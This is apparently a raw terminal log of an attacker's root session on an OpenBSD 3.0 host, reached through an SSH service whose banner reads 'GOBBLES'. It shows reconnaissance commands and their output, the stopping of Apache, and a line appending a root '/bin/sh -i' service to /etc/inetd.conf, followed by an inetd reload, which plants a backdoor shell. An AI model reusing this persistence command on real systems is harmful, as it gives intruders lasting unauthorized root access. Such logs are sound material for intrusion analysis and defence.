SSH-1.99-OpenSSH_3.0 SSH-2.0-GOBBLES GGGGO*GOBBLE* uname -a;id OpenBSD pufferfish 3.0 GENERIC#94 i386 uid=0(root) gid=0(wheel) groups=0(wheel) netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp 0 0 192.168.3.100.22 Hacker1.64952 ESTABLISHED tcp 1 0 192.168.3.100.22 Hacker1.64922 CLOSE_WAIT tcp 0 0 *.1524 *.* LISTEN tcp 0 0 *.22 *.* LISTEN tcp 0 0 127.0.0.1.587 *.* LISTEN tcp 0 0 127.0.0.1.25 *.* LISTEN tcp 0 0 *.37 *.* LISTEN tcp 0 0 *.13 *.* LISTEN tcp 0 0 *.113 *.* LISTEN tcp 0 0 *.80 *.* LISTEN tcp 0 0 127.0.0.1.111 *.* LISTEN tcp 0 0 *.111 *.* LISTEN udp 0 0 *.648 *.* udp 0 0 *.739 *.* udp 0 0 *.512 *.* udp 0 0 127.0.0.1.111 *.* udp 0 0 *.514 *.* udp 0 0 *.111 *.* tcp6 0 0 *.22 *.* LISTEN tcp6 0 0 ::1.587 *.* LISTEN tcp6 0 0 ::1.25 *.* LISTEN tcp6 0 0 *.37 *.* LISTEN tcp6 0 0 *.13 *.* LISTEN tcp6 0 0 *.113 *.* LISTEN udp6 0 0 *.512 *.* Active UNIX domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr 0xe0b0b700 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af4300 0xe0afc000 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af43c0 0xe0ae1f00 dgram 0 0 0x0 0xe0a97040 0x0 0xe0a58280 0xe0add800 dgram 0 0 0x0 0xe0a97040 0x0 0x0 0xe0ace500 dgram 0 0 0xefb43dd4 0x0 0xe0b09fc0 0x0 /dev/log apachectl stop /usr/sbin/apachectl stop: httpd stopped echo "httpd stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ps -aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 17519 0.0 0.1 280 212 ?? R 3:20PM 0:00.00 ps -aux root 1 0.0 0.1 332 200 ?? Is Tue02PM 0:00.02 /sbin/init root 25892 0.0 0.2 104 452 ?? Ss Tue02PM 0:00.14 syslogd root 13304 0.0 0.1 64 364 ?? Is Tue02PM 0:00.00 portmap root 10597 0.0 0.2 88 492 ?? Is Tue02PM 0:00.02 inetd root 212 0.0 0.5 836 1328 ?? Ss Tue02PM 0:01.30 sendmail: acc root 22389 0.0 0.4 332 1148 ?? Is Tue02PM 0:00.54 /usr/sbin/ssh root 11182 0.0 0.2 224 536 ?? Is Tue02PM 0:00.32 cron root 29118 0.0 0.2 44 428 C0 Is+ Tue02PM 0:00.00 /usr/libexec/ root 17521 0.0 0.2 44 428 C1 Is+ Tue02PM 0:00.00 /usr/libexec/ root 490 0.0 0.2 44 428 C2 Is+ Tue02PM 0:00.01 /usr/libexec/ root 17375 0.0 0.2 44 428 C3 Is+ Tue02PM 0:00.00 /usr/libexec/ root 4754 0.0 0.2 44 428 C5 Is+ Tue02PM 0:00.00 /usr/libexec/ megla 17905 0.0 0.4 452 1052 ?? Is 4:26PM 0:00.22 SCREEN (scree megla 30640 0.0 0.5 828 1196 p1 Is+ 4:26PM 0:00.04 /usr/bin/bash megla 31648 0.0 0.5 828 1196 p2 Is+ 4:26PM 0:00.05 /usr/bin/bash root 29679 0.0 0.1 292 144 ?? S 3:04PM 0:00.06 ping 192.168. root 17819 0.0 0.1 292 144 ?? S 3:11PM 0:00.02 ping 192.168. root 10662 0.0 0.1 372 260 ?? S 3:16PM 0:00.22 //bin/sh root 24147 0.0 0.0 0 0 ?? Z - 0:00.00 (cron) kill -HUP 10597 pwd / cd /usr/libexec ls afsd atrun auth comsat cpp cvs fingerd ftp-proxy ftpd getNAME getty hprop hpropd identd ipropd-master ipropd-slave kadmind kauthd kdc kerberos kfd kpasswdd kpropd ld.so lint1 lint2 locate.bigram locate.code locate.concatdb locate.mklocatedb locate.updatedb lockspool lpr mail.local makekey makewhatis nn ntalkd rexecd rlogind rpc.rquotad rpc.rstatd rpc.rusersd rpc.rwalld rpc.sprayd rshd safe_finger sendmail sftp-server sm.bin smrsh smtpd smtpfwdd tcpd telnetd tftpd uucpd vfontedpr vi.recover cd ../bin ls Mail a2p addftinfo afmtodit afslog altqstat apply apropos ar arch as asa asn1_compile at atq atrm aucat audioctl awk banner basename bash batch bc bdes biff c++ c++filt c2ph cal calendar cap_mkdb captoinfo cc cdio checknr chflags chfn chpass chsh ci cksum clear cmp co col colcrt colrm column comm compile_et compress cpp crontab ctags cu cut cvs cvsbug dbmmanage dc deroff diff diff3 dirname dprofpp du egrep elf2olf encrypt env eqn error ex expand f77 false fgen fgrep file file2c find find2perl finger flex flex++ fmt fold fpr from fsplit fstat ftp g++ g77 gcc gcov gdb gencat getconf getopt gnubc gprof grep grodvi groff grog grohtml grolj4 grops grotty groups gunzip gzcat gzexe gzip h2ph h2xs head help hexdump hoststat hpftodit htdigest htpasswd id ident indent indxbib info infocmp infotocap install install-info ipcrm ipcs join jot kauth kdestroy kdump keynote kf kinit klist ktrace lam last lastcomm ld ldd leave less lesskey lex lint lkbib lndir locate lock logger login logname look lookbib lorder lpq lpr lprm lynx m4 machine mail mailq mailx make makeinfo man merge mesg mg midiplay mixerctl mkdep mkstr mktemp modstat more mset msgs nawk nc neqn netstat newaliases newsyslog nfsstat nice nm nohup nroff objdump od oldrdist olf2elf otp-md4 otp-md5 otp-rmd160 otp-sha1 page pagesize pagsh passwd paste patch pctr perl perl5.6.1 perlbug perlcc perldoc pfbtops pic pl2pm pod2html pod2latex pod2man pod2text pod2usage podchecker podselect pr printenv printf protoize psbb pstruct purgestat quota radioctl ranlib rcs rcs2log rcsclean rcsdiff rcsfreeze rcsmerge rdist rdistd readlink refer renice reset rev rlog rlogin rpcgen rpcinfo rs rsh rup ruptime rusers rwall rwho s2p scp script sdiff sectok sed sendbug sftp shar showmount size skey skeyaudit skeyinfo skeyinit skeyprune slogin soelim sort splain split ssh ssh-add ssh-agent ssh-keygen ssh-keyscan string2key strings strip su sudo sum sup systat tail talk tbl tcopy tee telnet texi2dvi texindex tfmtodit tftp tic time tip tn3270 top touch tput tr troff true tset tsort tty ul uname uncompress unexpand unifdef uniq units unprotoize unvis uptime usbhidctl users uudecode uuencode vacation verify_krb5_conf vgrind vi view vis vmstat w wall wc what whatis whereis which who whoami whois window write x99token xargs xstr yacc yes ypcat ypmatch ypwhich yyfix zcat zcmp zdiff zegrep zfgrep zforce zgrep zmore znew ls *get ls: *get: No such file or directory echo $PATH /usr/bin:/bin:/usr/sbin:/sbin:/usr/X11R6/bin:/usr/local/bin ls /bin [ cat chgrp chio chmod cp cpio csh date dd df domainname echo ed eject expr hostname kill ksh ln ls md5 mkdir mt mv pax ps pwd rcp rksh rm rmail rmd160 rmdir sh sha1 sleep stty sync tar test netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp 0 0 192.168.3.100.22 Hacker1.64952 ESTABLISHED tcp 1 0 192.168.3.100.22 Hacker1.64922 CLOSE_WAIT tcp 0 0 *.1524 *.* LISTEN tcp 0 0 *.22 *.* LISTEN tcp 0 0 127.0.0.1.587 *.* LISTEN tcp 0 0 127.0.0.1.25 *.* LISTEN tcp 0 0 *.37 *.* LISTEN tcp 0 0 *.13 *.* LISTEN tcp 0 0 *.113 *.* LISTEN tcp 0 0 127.0.0.1.111 *.* LISTEN tcp 0 0 *.111 *.* LISTEN udp 0 0 *.648 *.* udp 0 0 *.739 *.* udp 0 0 *.512 *.* udp 0 0 127.0.0.1.111 *.* udp 0 0 *.514 *.* udp 0 0 *.111 *.* tcp6 0 0 *.22 *.* LISTEN tcp6 0 0 ::1.587 *.* LISTEN tcp6 0 0 ::1.25 *.* LISTEN tcp6 0 0 *.37 *.* LISTEN tcp6 0 0 *.13 *.* LISTEN tcp6 0 0 *.113 *.* LISTEN udp6 0 0 *.512 *.* Active UNIX domain sockets Address Type Recv-Q Send-Q Inode Conn Refs Nextref Addr 0xe0b0b700 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af4300 0xe0afc000 dgram 0 0 0x0 0xe0a97040 0x0 0xe0af43c0 0xe0ae1f00 dgram 0 0 0x0 0xe0a97040 0x0 0xe0a58280 0xe0af1200 dgram 0 0 0x0 0xe0a97040 0x0 0xe0b09fc0 0xe0add800 dgram 0 0 0x0 0xe0a97040 0x0 0x0 0xe0ace500 dgram 0 0 0xefb43dd4 0x0 0xe0b13a40 0x0 /dev/log